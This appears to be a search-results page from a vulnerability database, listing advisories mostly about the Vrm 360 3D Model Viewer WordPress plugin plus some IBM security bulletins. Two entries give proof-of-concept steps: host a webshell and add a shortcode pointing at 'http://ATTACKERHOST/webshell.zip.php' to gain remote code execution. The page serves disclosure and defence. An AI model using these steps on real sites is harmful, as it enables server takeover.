67 matches found
MINI-H44F-2CR2-VRM6
Bulletin has no description...
EUVD-2021-10786
Malware in sbrugna...
EUVD-2021-10785
Malware in sbrugna...
EUVD-2021-10788
Malware in sbrugna...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
Security Bulletin: XSS vulnerability affects IBM Cloud Object Storage System (CVE-2021-39014)
Summary XSS vulnerability affects IBM Cloud Object Storage System CVE-2021-39014. This vulnerability has been addressed in the latest ClevOS releases. Vulnerability Details CVEID:CVE-2021-39014 DESCRIPTION: IBM Cloud Object System is vulnerable to stored cross-site scripting. This vulnerability...
Security Bulletin: IBM Storage Insights is vulnerable to weaknesses related to IBM® SDK, Java™ Technology Edition
Summary Vulnerabilities in IBM® SDK, Java™ Technology Edition may affect IBM Storage Insights which could allow a remote attacker to cause low integrity impact, low availability impat. Vulnerability Details CVEID:CVE-2024-21094 DESCRIPTION: An unspecified vulnerability in Java SE related to the V...
Security Bulletin: pdfmake vulnerability affect IBM Spectrum Control
Summary Vulnerability in pdfmake could allow a remote attacker to execute arbitrary code on the system, which could affect IBM Spectrum Control. CVE-2024-25180. Vulnerability Details CVEID:CVE-2024-25180 DESCRIPTION: pdfmake could allow a remote attacker to execute arbitrary code on the system,...
How to Accelerate Vendor Risk Assessments in the Age of SaaS Sprawl
In today's digital-first business environment dominated by SaaS applications, organizations increasingly depend on third-party vendors for essential cloud services and software solutions. As more vendors and services are added to the mix, the complexity and potential vulnerabilities within the Sa...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311 Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode...
CVE-2023-4311
CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...
WordPress Plugin Vrm 360 3D Model Viewer Security Vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A security vulnerability exists in WordPres...
PT-2023-28700 · WordPress · Vrm 360 3D Model Viewer
Name of the Vulnerable Software and Affected Versions: Vrm 360 3D Model Viewer WordPress plugin versions 1.2.1 and earlier Description: The issue arises from insufficient checks in a plugin shortcode, allowing for arbitrary file upload. Recommendations: For Vrm 360 3D Model Viewer WordPress plugi...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-5177
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...